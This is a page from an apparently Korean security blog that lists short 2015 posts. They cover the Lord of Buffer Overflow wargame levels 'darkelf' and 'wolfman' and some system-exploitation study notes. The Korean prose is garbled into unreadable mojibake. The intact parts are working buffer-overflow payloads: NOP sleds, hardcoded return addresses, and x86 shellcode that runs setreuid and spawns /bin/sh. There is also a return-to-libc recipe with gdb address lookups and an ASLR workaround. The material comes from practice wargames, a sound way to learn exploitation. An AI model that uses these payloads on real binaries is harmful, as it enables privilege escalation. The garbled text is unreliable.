๐’ƒ๐’†๐’‚๐’–๐’•๐’š ๐’Š๐’๐’•๐’†๐’๐’๐’Š๐’ˆ๐’†๐’๐’•
728x90
๋ฐ˜์‘ํ˜•
article thumbnail
LOB darklf
Wargame/CTF(Capture The Flag) 2015. 9. 15. 05:28

์†Œ์Šค๋ฅผ ์—ด์–ด๋ณด๋ฉด ์ผ๋‹จ ์ „๋ฌธ์ œ๋ž‘ ๋น„์Šทํ•œ๋ฐ ๊ธธ์ด๋ฅผ ์ฒดํฌํ•œ๋‹ค.์ฒซ๋ฒˆ์งธ์ธ์ž ๊ฐ’์˜ ๊ธธ์ด๋ฅผ ํ™•์ธํ•˜์—ฌ 48๊ธ€์ž๋ณด๋‹ค ํฌ๋ฉด ๋‚˜์™€๋ฒ„๋ฆฌ๋Š” ๊ฒƒ์„ ํ™•์ธ ํ• ์ˆ˜ ์žˆ๋‹ค. ์ผ๋‹จ ์•ž๊ณผ ๋˜‘๊ฐ™์ด ์ง„ํ–‰ํ•˜๊ณ  payload๋ฅผ ์ž‘์„ฑ๋•Œ ./darkelf $(python -c 'print "\x90"*40+"AAAA"+"\xcc\xfb\xff\xbf"')

article thumbnail
LOB wolfman
Wargame/CTF(Capture The Flag) 2015. 9. 15. 05:09

๋‹ค์‹œ ๋ฌธ์ œ๋ฅผ ํ’€๋ฉด ๋‘๋‘ฅ ์ „ ๋ฌธ์ œ๋ž‘ ๋˜‘๊ฐ™์€ ํŒจํ„ด์ด๋‹ค. ./wolfman $(python -c 'print "\x90"*40+"AAAA(dummy)"+"\xec\xfb\xff\xbf"(์ฃผ์†Œ๊ฐ’)+"\x90"*180+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"')

system 2
Security Study/System 2015. 9. 13. 03:19

gdb์•ˆ์—์„œ์˜ blocking ํ•จ์ˆ˜ ์ž…๋ ฅ r

system 1์ผ์ฐจ
Security Study/System 2015. 9. 12. 08:54

buf[248] + sfp[4] + ret ulimit -s unlimited //์Šคํƒํฌ๊ธฐ๋ฅผ ๋ฌดํ•œ์ •์œผ๋กœ ๋Š˜๋ ค ASLR์ด ์ ์šฉ์•ˆ๋จ system,execve - ebp+8์œ„์น˜์—์žˆ๋Š”๊ฒƒ์„ ์ธ์ž๋กœ๋ฐ›์Œ buf[248] + sfp [4] + ์กฐ์ž‘(system) + AAAA + /bin/sh - system("/bin/sh") b main r 1 p system - system์ฃผ์†Œ ๊ตฌํ•˜๊ธฐ p exit - exit๊ตฌํ•˜๊ธฐ find &system,+9999999,"/bin/sh" - /bin/sh์ฃผ์†Œ ๊ตฌํ•˜๊ธฐ ./filename $(python -c 'print "A"*๋ฒ„ํผ+sfp + system + exit + /bin/sh strcpy(bss,\x80asda) strcpy(bss,"b") ./filename buf+sfp..

728x90
๋ฐ˜์‘ํ˜•
profile on loading

Loading...